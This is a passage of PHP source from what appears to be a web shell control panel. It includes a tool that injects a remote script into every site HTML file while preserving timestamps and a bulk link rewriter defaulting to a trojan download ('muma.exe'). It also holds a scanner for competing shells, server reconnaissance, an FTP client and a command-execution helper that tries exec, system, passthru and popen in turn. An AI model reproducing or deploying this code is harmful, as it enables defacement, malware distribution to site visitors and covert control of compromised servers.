echo Qingma_Auto($_POST['qp'],$qt,$_POST['qc'],$qd,$qb) ? 'Done' : 'Abort';
|
|||
|
|
echo '<br><input class="bt" type="button" value="back" onclick="history.back();">';
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
$FILE_DIR = File_Str(dirname(__FILE__));
|
|||
|
|
$ROOT_DIR = File_Mode();
|
|||
|
|
print<<<END
|
|||
|
|
<script language="javascript">
|
|||
|
|
function Fullll(i){
|
|||
|
|
if(i==0) return false;
|
|||
|
|
Str = new Array(5);
|
|||
|
|
if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";xform.qp.value = Str[i];}
|
|||
|
|
else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";xform.qt.value = Str[i];}
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
function autoup(){
|
|||
|
|
if(document.getElementById('qp').value == ''){alert('path can not be empty');return false;}
|
|||
|
|
if(document.getElementById('qt').value == ''){alert('type can not be empty');return false;}
|
|||
|
|
if(document.getElementById('qc').value == ''){alert('code can not be empty');return false;}
|
|||
|
|
document.getElementById('xform').submit();
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<form method="POST" name="xform" id="xform" action="?s=c">
|
|||
|
|
<div class="actall" style="height:35px;">Path: <input type="text" name="qp" id="qp" value="{$ROOT_DIR}" style="width:500px;">
|
|||
|
|
<select onchange='return Fullll(options[selectedIndex].value)'>
|
|||
|
|
<option value="0" selected>--select range--</option>
|
|||
|
|
<option value="1">site root folder</option>
|
|||
|
|
<option value="2">current folder</option>
|
|||
|
|
</select></div>
|
|||
|
|
<div class="actall" style="height:35px;">Type: <input type="text" name="qt" id="qt" value=".htm|.html|.shtml" style="width:500px;">
|
|||
|
|
<select onchange='return Fullll(options[selectedIndex].value)'>
|
|||
|
|
<option value="0" selected>--select type--</option>
|
|||
|
|
<option value="3">html</option>
|
|||
|
|
<option value="4">script+html</option>
|
|||
|
|
<option value="5">js</option>
|
|||
|
|
</select></div>
|
|||
|
|
<div class="actall">Clean Code <textarea name="qc" id="qc" style="width:610px;height:180px;"><script language=javascript src="http://www.baidu.com/ad.js"></script></textarea></div>
|
|||
|
|
<div class="actall" style="height:30px;"><input type="checkbox" name="qd" value="1" checked>keep file time unchanged</div>
|
|||
|
|
<div class="actall" style="height:50px;"><input type="radio" name="qb" value="a" checked>applied to current folder,subfolders and files
|
|||
|
|
<br><input type="radio" name="qb" value="b">only applied to current folder</div>
|
|||
|
|
<div class="actall"><input class="bt" type="button" value="begin" onclick="autoup();"></div>
|
|||
|
|
</form>
|
|||
|
|
END;
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//bulk replace
|
|||
|
|
|
|||
|
|
function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)
|
|||
|
|
{
|
|||
|
|
if(($h_d = @opendir($tp)) == NULL) return false;
|
|||
|
|
while(false !== ($Filename = @readdir($h_d)))
|
|||
|
|
{
|
|||
|
|
if($Filename == '.' || $Filename == '..') continue;
|
|||
|
|
$Filepath = File_Str($tp.'/'.$Filename);
|
|||
|
|
if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);
|
|||
|
|
$doing = false;
|
|||
|
|
if(eregi($tt,$Filename))
|
|||
|
|
{
|
|||
|
|
$ic = File_Read($Filepath);
|
|||
|
|
if($th)
|
|||
|
|
{
|
|||
|
|
if(!stristr($ic,$tca)) continue;
|
|||
|
|
$ic = str_replace($tca,$tcb,$ic);
|
|||
|
|
$doing = true;
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
{
|
|||
|
|
preg_match_all("/\<a href\=\"([^~]*?)\"/i",$ic,$nc);
|
|||
|
|
for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}}
|
|||
|
|
}
|
|||
|
|
if($td) $ftime = @filemtime($Filepath);
|
|||
|
|
if($doing) echo File_Write($Filepath,$ic,'wb') ? 'ok:'.$Filepath.'<br>'."\r\n" : 'err:'.$Filepath.'<br>'."\r\n";
|
|||
|
|
if($td) @touch($Filepath,$ftime);
|
|||
|
|
ob_flush();
|
|||
|
|
flush();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
@closedir($h_d);
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function Tihuan_d()
|
|||
|
|
{
|
|||
|
|
if((!empty($_POST['tp'])) && (!empty($_POST['tt'])))
|
|||
|
|
{
|
|||
|
|
$tt = str_replace('.','\\.',$_POST['tt']);
|
|||
|
|
$td = isset($_POST['td']) ? true : false;
|
|||
|
|
$tb = ($_POST['tb'] == 'a') ? true : false;
|
|||
|
|
$th = ($_POST['th'] == 'a') ? true : false;
|
|||
|
|
if($th) $_POST['tca'] = str_replace('.','\\.',$_POST['tca']);
|
|||
|
|
echo Tihuan_Auto($_POST['tp'],$tt,$th,$_POST['tca'],$_POST['tcb'],$td,$tb) ? 'Done' : 'Abort';
|
|||
|
|
echo '<br><input class="bt" type="button" value="back" onclick="window.location=\'?s=d\'">';
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
$FILE_DIR = File_Str(dirname(__FILE__));
|
|||
|
|
$ROOT_DIR = File_Mode();
|
|||
|
|
print<<<END
|
|||
|
|
<script language="javascript">
|
|||
|
|
function Fulllll(i){
|
|||
|
|
if(i==0) return false;
|
|||
|
|
Str = new Array(5);
|
|||
|
|
if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];}
|
|||
|
|
else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];}
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
function showth(th){
|
|||
|
|
if(th == 'a') document.getElementById('setauto').innerHTML = '<tr>Searchment</tr> <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>Replacement <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea>';
|
|||
|
|
if(th == 'b') document.getElementById('setauto').innerHTML = '<br><tr>Download Suffix</tr> <input type="text" name="tca" id="tca" value=".exe|.z0|.rar|.zip|.gz|.torrent" style="width:500px;"><br><br>   Replacement   <input type="text" name="tcb" id="tcb" value="http://www.baidu.com/download/muma.exe" style="width:500px;">';
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
function autoup(){
|
|||
|
|
if(document.getElementById('tp').value == ''){alert('path can not be empty');return false;}
|
|||
|
|
if(document.getElementById('tt').value == ''){alert('type can not be empty');return false;}
|
|||
|
|
if(document.getElementById('tca').value == '' || document.getElementById('tcb').value == ''){alert('replacement can not be empty');return false;}
|
|||
|
|
document.getElementById('tform').submit();
|
|||
|
|
}
|
|||
|
|
</script>
|
|||
|
|
<form method="POST" name="tform" id="tform" action="?s=d">
|
|||
|
|
<div class="actall" style="height:35px;">Path: <input type="text" name="tp" id="tp" value="{$ROOT_DIR}" style="width:500px;">
|
|||
|
|
<select onchange='return Fulllll(options[selectedIndex].value)'>
|
|||
|
|
<option value="0" selected>--select range--</option>
|
|||
|
|
<option value="1">site root folder</option>
|
|||
|
|
<option value="2">current folder</option>
|
|||
|
|
</select></div>
|
|||
|
|
<div class="actall" style="height:35px;">Type: <input type="text" name="tt" id="tt" value=".htm|.html|.shtml" style="width:500px;">
|
|||
|
|
<select onchange='return Fulllll(options[selectedIndex].value)'>
|
|||
|
|
<option value="0" selected>--select type--</option>
|
|||
|
|
<option value="3">html</option>
|
|||
|
|
<option value="4">script+html</option>
|
|||
|
|
<option value="5">js</option>
|
|||
|
|
</select></div>
|
|||
|
|
<div class="actall" style="height:235px;"><input type="radio" name="th" value="a" onclick="showth('a')" checked>Designated Content Of The Repalce File <input type="radio" name="th" value="b" onclick="showth('b')">Download Url Of The Replace File<br>
|
|||
|
|
<div id="setauto">Searchment:  <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>Replacement: <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea></div></div>
|
|||
|
|
<div class="actall" style="height:30px;"><input type="checkbox" name="td" value="1" checked>keep file time unchanged</div>
|
|||
|
|
<div class="actall" style="height:50px;"><input type="radio" name="tb" value="a" checked>applied to current folder,subfolders and files
|
|||
|
|
<br><input type="radio" name="tb" value="b">only applied to current folder</div>
|
|||
|
|
<div class="actall"><input class="bt" type="button" value="Begin" onclick="autoup();"></div>
|
|||
|
|
</form>
|
|||
|
|
END;
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//clean trojan
|
|||
|
|
|
|||
|
|
function Antivirus_Auto($sp,$features,$st)
|
|||
|
|
{
|
|||
|
|
if(($h_d = @opendir($sp)) == NULL) return false;
|
|||
|
|
$ROOT_DIR = File_Mode();
|
|||
|
|
while(false !== ($Filename = @readdir($h_d)))
|
|||
|
|
{
|
|||
|
|
if($Filename == '.' || $Filename == '..') continue;
|
|||
|
|
$Filepath = File_Str($sp.'/'.$Filename);
|
|||
|
|
if(is_dir($Filepath)) Antivirus_Auto($Filepath,$features,$st);
|
|||
|
|
if(eregi($st,$Filename))
|
|||
|
|
{
|
|||
|
|
if($Filepath == File_Str(__FILE__)) continue;
|
|||
|
|
$ic = File_Read($Filepath);
|
|||
|
|
foreach($features as $var => $key)
|
|||
|
|
{
|
|||
|
|
if(stristr($ic,$key))
|
|||
|
|
{
|
|||
|
|
$Fileurls = str_replace($ROOT_DIR,'http://'.$_SERVER['SERVER_NAME'].'/',$Filepath);
|
|||
|
|
$Filetime = @date('Y-m-d H:i:s',@filemtime($Filepath));
|
|||
|
|
echo '<a href="'.$Fileurls.'" target="_blank"><font color="#FF0000">'.$Filepath.'</font></a><br><3E><><a href="?s=e&fp='.urlencode($sp).'&fn='.$Filename.'&dim='.urlencode($key).'" target="_blank">Edit</a> <a href="?s=e&df='.urlencode($Filepath).'" target="_blank">Del</a><3E><> ';
|
|||
|
|
echo '<27><>'.$Filetime.'<27><> <font color="#FF0000">'.$var.'</font><br><br>';
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
ob_flush();
|
|||
|
|
flush();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
@closedir($h_d);
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function Antivirus_e()
|
|||
|
|
{
|
|||
|
|
if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo ' <font style=font:11pt color=ff0000>del successfully</font>';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? ' <font style=font:11pt color=ff0000>del successfully</font>' : ' <font style=font:11pt color=ff0000>del faild</font>';} return false;}
|
|||
|
|
if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
|
|||
|
|
$SCAN_DIR = (File_Mode() == '') ? File_Str(dirname(__FILE__)) : File_Mode();
|
|||
|
|
$features_php = array('ftp.class.php'=>'ftp.class.php','cha88.cn'=>'cha88.cn','Security Angel Team'=>'Security Angel Team','read()'=>'->read()','readdir'=>'readdir(','return string soname'=>'returns string soname','eval()'=>'eval(gzinflate(','eval(base64_decode())'=>'eval(base64_decode(','eval($_POST)'=>'eval($_POST','eval($_REQUEST)'=>'eval($_REQUEST','eval ($_)'=>'eval ($_','copy()'=>'copy($_FILES','copy ()'=>'copy ($_FILES','move_uploaded_file()'=>'move_uploaded_file($_FILES','move_uploaded_file ()'=>'move_uploaded_file ($_FILES','str_replace()'=>'str_replace(\'\\\\\',\'/\',');
|
|||
|
|
$features_asx = array('<27><><EFBFBD><EFBFBD>·<EFBFBD><C2B7>'=>'<27><><EFBFBD><EFBFBD>·<EFBFBD><C2B7>','<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'=>'<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>','fso.createtextfile()'=>'fso.createtextfile(path,true)','<%execute(request())%>'=>'<%execute(request','<%eval request()%>'=>'<%eval request','execute session()'=>'execute session(','--Created!'=>'--Created!','WScript.Shell'=>'WScript.Shell','<%s LANGUAGE = VBScript.Encode %>'=>'<%@ LANGUAGE = VBScript.Encode %>','www.rootkit.net.cn'=>'www.rootkit.net.cn','Process.GetProcesses'=>'Process.GetProcesses','lake2'=>'lake2');
|
|||
|
|
print<<<END
|
|||
|
|
<div class="actall" style="height:100px;"><form method="POST" name="tform" id="tform" action="?s=e">
|
|||
|
|
Path: <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:400px;">
|
|||
|
|
<select name="st">
|
|||
|
|
<option value="php">phpshell</option>
|
|||
|
|
<option value="asx">aspshell+aspxshell</option>
|
|||
|
|
<option value="ppp">phpshell+aspshell+aspxshell</option>
|
|||
|
|
</select>
|
|||
|
|
<input class="bt" type="submit" value="Scan">
|
|||
|
|
</form><br>
|
|||
|
|
END;
|
|||
|
|
if(!empty($_POST['sp']))
|
|||
|
|
{
|
|||
|
|
if($_POST['st'] == 'php'){$features_all = $features_php; $st = '\.php|\.inc|\.php4|\.php3|\._hp|\;';}
|
|||
|
|
if($_POST['st'] == 'asx'){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\.cdx|\;';}
|
|||
|
|
if($_POST['st'] == 'ppp'){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.php4|\.php3|\._hp|\.asp|\.asa|\.cer|\.cdx|\.aspx|\.ascx|\;';}
|
|||
|
|
echo Antivirus_Auto($_POST['sp'],$features_all,$st) ? 'Done' : 'Abort';
|
|||
|
|
}
|
|||
|
|
echo '</div>';
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
//search file
|
|||
|
|
function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)
|
|||
|
|
{
|
|||
|
|
//echo $sfp.'<br>'.$sfc.'<br>'.$sft.'<br>'.$sff.'<br>'.$sfb;
|
|||
|
|
if(($h_d = @opendir($sfp)) == NULL) return false;
|
|||
|
|
while(false !== ($Filename = @readdir($h_d)))
|
|||
|
|
{
|
|||
|
|
if($Filename == '.' || $Filename == '..') continue;
|
|||
|
|
if(eregi($sft,$Filename)) continue;
|
|||
|
|
$Filepath = File_Str($sfp.'/'.$Filename);
|
|||
|
|
if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);
|
|||
|
|
if($sff)
|
|||
|
|
{
|
|||
|
|
if(stristr($Filename,$sfc))
|
|||
|
|
{
|
|||
|
|
echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
|
|||
|
|
ob_flush();
|
|||
|
|
flush();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
{
|
|||
|
|
$File_code = File_Read($Filepath);
|
|||
|
|
if(stristr($File_code,$sfc))
|
|||
|
|
{
|
|||
|
|
echo '<a target="_blank" href="?s=p&fp='.urlencode($sfp).'&fn='.urlencode($Filename).'"> '.$Filepath.' </a><br>'."\r\n";
|
|||
|
|
ob_flush();
|
|||
|
|
flush();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
@closedir($h_d);
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
function Findfile_j()
|
|||
|
|
{
|
|||
|
|
if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo '<font style=font:11pt color=ff0000>del successfully</font>';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? '<font style=font:11pt color=ff0000>del successfully</font>' : '<font style=font:11pt color=ff0000>del faild</font>';} return false;}
|
|||
|
|
if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; }
|
|||
|
|
$SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode();
|
|||
|
|
$SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config';
|
|||
|
|
$SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip';
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="jform" id="jform" action="?s=u">
|
|||
|
|
<div class="actall">Scan Path <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
|
|||
|
|
<div class="actall"> File Filter  <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
|
|||
|
|
<div class="actall">Keywords <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
|
|||
|
|
<input type="radio" name="sff" value="a" checked>search filename
|
|||
|
|
<input type="radio" name="sff" value="b">search include keywords</div>
|
|||
|
|
<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>applied to current folder,subfolders and files
|
|||
|
|
<br><input type="radio" name="sfb" value="b">only applied to current folder</div>
|
|||
|
|
<div class="actall"><input class="bt" type="submit" value="scan" style="width:80px;"></div>
|
|||
|
|
</form>
|
|||
|
|
END;
|
|||
|
|
if((!empty($_POST['sfp'])) && (!empty($_POST['sfc'])))
|
|||
|
|
{
|
|||
|
|
echo '<div class="actall">';
|
|||
|
|
$_POST['sft'] = str_replace('.','\\.',$_POST['sft']);
|
|||
|
|
$sff = ($_POST['sff'] == 'a') ? true : false;
|
|||
|
|
$sfb = ($_POST['sfb'] == 'a') ? true : false;
|
|||
|
|
echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '<font style=font:11pt color=ff0000>Done</font>' : '<font style=font:11pt color=ff0000>Error</font>';
|
|||
|
|
echo '</div>';
|
|||
|
|
}
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
//ftp connect
|
|||
|
|
function filecollect($dir,$filelist) {
|
|||
|
|
$files = ftp_nlist($conn,$dir);
|
|||
|
|
return $files;
|
|||
|
|
}
|
|||
|
|
function ftp_php(){
|
|||
|
|
$dir = "";
|
|||
|
|
$ftphost = isset($_POST['ftphost']) ? $_POST['ftphost'] : '127.0.0.1';
|
|||
|
|
$ftpuser = isset($_POST['ftpuser']) ? $_POST['ftpuser'] : 'root';
|
|||
|
|
$ftppass = isset($_POST['ftppass']) ? $_POST['ftppass'] : 'root';
|
|||
|
|
$ftplist = isset($_POST['list']) ? $_POST['list'] : '';
|
|||
|
|
$ftpfolder = isset($_POST['ftpfolder']) ? $_POST['ftpfolder'] : '/';
|
|||
|
|
$ftpfolder = strtr($ftpfolder,"\\","/");
|
|||
|
|
$files = isset($_POST['readfile']) ? $_POST['readfile'] : '';
|
|||
|
|
print<<<END
|
|||
|
|
<br><br><div class="actall"><h5>connect ftp server with php</h5><br></div>
|
|||
|
|
<form method="POST" name="" action=""><br>
|
|||
|
|
<div class="actall">Host:<input type="text" name="ftphost" value="{$ftphost}" style="width:100px">
|
|||
|
|
User:<input type="text" name="ftpuser" value="{$ftpuser}" style="width:100px">
|
|||
|
|
Pass:<input type="text" name="ftppass" value="{$ftppass}" style="width:100px"><br><br>
|
|||
|
|
<input type="hidden" name="readfile" value="" style="width:200px">
|
|||
|
|
folder:<input type="text" name="ftpfolder" value="{$ftpfolder}" style="width:200px">
|
|||
|
|
<input type="hidden" name="list" value="list">
|
|||
|
|
<input class="bt" type="submit" name="list" value="list" style="width:40px"><br><br></form></div>
|
|||
|
|
END;
|
|||
|
|
if($ftplist == 'list'){
|
|||
|
|
$conn = @ftp_connect($ftphost) or die("could not connect to ftp server");
|
|||
|
|
if(@ftp_login($conn,$ftpuser,$ftppass)){
|
|||
|
|
$filelists = @ftp_nlist( $conn, $ftpfolder );
|
|||
|
|
echo "<pre>";
|
|||
|
|
echo "current folder is <font color='#FF0000'>$ftpfolder</font>:<br>";
|
|||
|
|
if(is_array($filelists))
|
|||
|
|
{
|
|||
|
|
foreach ($filelists as $file)
|
|||
|
|
{
|
|||
|
|
$file = strtr($file,"\\","/");
|
|||
|
|
$size_file =@ftp_size($conn, $file);
|
|||
|
|
if ( $size_file == -1)
|
|||
|
|
{
|
|||
|
|
$a=$a.basename($file)."<br>";
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
{
|
|||
|
|
$b=$b.basename($file)." ".$size_file."B</br>";
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
echo $a;
|
|||
|
|
echo $b;
|
|||
|
|
echo "</pre>";
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" name="" action="" >
|
|||
|
|
<div class="actall">filename:<input type="text" name="readfile" value="{$files}" style="width:200px">
|
|||
|
|
<input type="hidden" name="read" value="read">
|
|||
|
|
<input class="bt" type="submit" name="read" value="read" style="width:40px"><br><br></form></div>
|
|||
|
|
END;
|
|||
|
|
$readaction = isset($_POST['read']) ? $_POST['read'] : '';
|
|||
|
|
if ($readaction == 'read') {
|
|||
|
|
$handle = @file_get_contents("ftp://$ftpuser:$ftppass@$ftphost/$files", "r");
|
|||
|
|
$handle = htmlspecialchars($handle);
|
|||
|
|
$handle = str_replace("\n", "<br>", $handle);
|
|||
|
|
echo "the content of <font color='#FF0000'>$files</font> is:<br><br>";
|
|||
|
|
echo $handle;
|
|||
|
|
}
|
|||
|
|
print<<<END
|
|||
|
|
<form method="post" enctype="multipart/form-data" name="" action="">
|
|||
|
|
<div class="actall">folder:<input type="text" name="cdir" value="{$cdir}" style="width:100px">
|
|||
|
|
<input type="file" name="upload" value="upload" style="width:200px;height:22px;">
|
|||
|
|
<input type="hidden" name="upfile" value="upfile">
|
|||
|
|
<input class="bt" type="submit" name="submit" value="upfile" style="width:40px"><br><br></form></div>
|
|||
|
|
END;
|
|||
|
|
$upaction = isset($_POST['upfile']) ? $_POST['upfile'] : '' ;
|
|||
|
|
if ($upaction == 'upfile') {
|
|||
|
|
$cdir = isset($_POST['cdir']) ? $_POST['cdir'] : '/';
|
|||
|
|
$conn = @ftp_connect($ftphost) or die("could not connect to ftp server");
|
|||
|
|
if(@ftp_login($conn,$ftpuser,$ftppass)){
|
|||
|
|
@ftp_chdir($conn, $cdir);
|
|||
|
|
$res_code = @ftp_put($conn,$_FILES['upload']['name'],$_FILES['upload']['tmp_name'], FTP_BINARY,0);
|
|||
|
|
if (empty($res_code)){
|
|||
|
|
echo '<font color="#FF67A0">ftp upload faild</font><br>';
|
|||
|
|
}
|
|||
|
|
else{
|
|||
|
|
echo '<font color="#FF67A0">ftp upload successful</font><br>';
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
print<<<END
|
|||
|
|
<form method="POST" enctype="multipart/form-data" name="" action="">
|
|||
|
|
<div class="actall">path:<input type="text" name="downfile" value="{$getfile}" style="width:100px">
|
|||
|
|
<input type="hidden" name="getfile" value="down">
|
|||
|
|
<input class="bt" type="submit" name="down" value="down" style="width:40px"><br><br></form></div>
|
|||
|
|
END;
|
|||
|
|
$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : '';
|
|||
|
|
$getaction = isset($_POST['getfile']) ? $_POST['getfile'] : '';
|
|||
|
|
if ($getaction == 'down' && $getfile !=''){
|
|||
|
|
function php_ftp_download($filename){
|
|||
|
|
global $ftphost,$ftpuser,$ftppass;
|
|||
|
|
$ftp_path = dirname($filename) . "/";
|
|||
|
|
$select_file = basename($filename);
|
|||
|
|
$ftp = @ftp_connect($ftphost);
|
|||
|
|
if($ftp){
|
|||
|
|
if(@ftp_login($ftp, $ftpuser, $ftppass)){
|
|||
|
|
if(@ftp_chdir($ftp,$ftp_path)) {
|
|||
|
|
$tmpfile = tempnam(getcwd(),"temp");
|
|||
|
|
if(ftp_get($ftp,$tmpfile,$select_file,FTP_BINARY)){
|
|||
|
|
ftp_quit($ftp);
|
|||
|
|
header("Content-Type:application/octet-stream");
|
|||
|
|
header("Content-Disposition:attachment; filename=" . $select_file);
|
|||
|
|
unlink($tmpfile);
|
|||
|
|
exit;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
ftp_quit($ftp);
|
|||
|
|
}
|
|||
|
|
php_ftp_download($getfile);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
//server info
|
|||
|
|
|
|||
|
|
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
|
|||
|
|
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
|
|||
|
|
function Info_f()
|
|||
|
|
{
|
|||
|
|
$dis_func = get_cfg_var("disable_functions");
|
|||
|
|
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "upfile forbidden";
|
|||
|
|
$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
|
|||
|
|
if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
|
|||
|
|
$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
|
|||
|
|
$info = array(
|
|||
|
|
array("server time",date("Y-m-d h:i:s",time())),
|
|||
|
|
array("server domain","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
|
|||
|
|
array("server ip",gethostbyname($_SERVER['SERVER_NAME'])),
|
|||
|
|
array("server os",PHP_OS),
|
|||
|
|
array("server os language",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
|
|||
|
|
array("server powerby",$_SERVER['SERVER_SOFTWARE']),
|
|||
|
|
array("your IP",getenv('REMOTE_ADDR')),
|
|||
|
|
array("server port",$_SERVER['SERVER_PORT']),
|
|||
|
|
array("php run mode",strtoupper(php_sapi_name())),
|
|||
|
|
array("php ver",PHP_VERSION),
|
|||
|
|
array("run in safe mode",Info_Cfg("safemode")),
|
|||
|
|
array("server administrator",$adminmail),
|
|||
|
|
array("current file path",__FILE__),
|
|||
|
|
array("allow_url_fopen",Info_Cfg("allow_url_fopen")),
|
|||
|
|
array("enable load dll",Info_Cfg("enable_dl")),
|
|||
|
|
array("display_errors",Info_Cfg("display_errors")),
|
|||
|
|
array("register_globals",Info_Cfg("register_globals")),
|
|||
|
|
array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
|
|||
|
|
array("memory_limit",Info_Cfg("memory_limit")),
|
|||
|
|
array("post_max_size",Info_Cfg("post_max_size")),
|
|||
|
|
array("upload_max_filesize",$upsize),
|
|||
|
|
array("max_execution_time",Info_Cfg("max_execution_time")."second"),
|
|||
|
|
array("disable_functions",$dis_func),
|
|||
|
|
array("phpinfo()",$phpinfo),
|
|||
|
|
array("free disk space",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
|
|||
|
|
array("GD Library",Info_Fun("imageline")),
|
|||
|
|
array("IMAP",Info_Fun("imap_close")),
|
|||
|
|
array("Mysql database",Info_Fun("mysql_close")),
|
|||
|
|
array("SyBase database",Info_Fun("sybase_close")),
|
|||
|
|
array("Oracle database",Info_Fun("ora_close")),
|
|||
|
|
array("Oracle 8 database",Info_Fun("OCILogOff")),
|
|||
|
|
array("PREL PCRE",Info_Fun("preg_match")),
|
|||
|
|
array("support PDF",Info_Fun("pdf_close")),
|
|||
|
|
array("Postgresql database",Info_Fun("pg_close")),
|
|||
|
|
array("SNMP",Info_Fun("snmpget")),
|
|||
|
|
array("Zlib",Info_Fun("gzclose")),
|
|||
|
|
array("parse XML",Info_Fun("xml_set_object")),
|
|||
|
|
array("FTP",Info_Fun("ftp_login")),
|
|||
|
|
array("ODBC",Info_Fun("odbc_close")),
|
|||
|
|
array("support Session",Info_Fun("session_start")),
|
|||
|
|
array("support Socket",Info_Fun("fsockopen")),
|
|||
|
|
);
|
|||
|
|
echo '<table width="100%" border="0">';
|
|||
|
|
for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}
|
|||
|
|
echo '</table>';
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
//execute command with php function
|
|||
|
|
function Exec_Run($cmd)
|
|||
|
|
{
|
|||
|
|
$res = '';
|
|||
|
|
if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
|
|||
|
|
elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
|
|||
|
|
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
|
|||
|
|
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
|
|||
|
|
elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
|
|||
|
|
return $res;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
function Exec_g()
|
|||
|
|
{
|
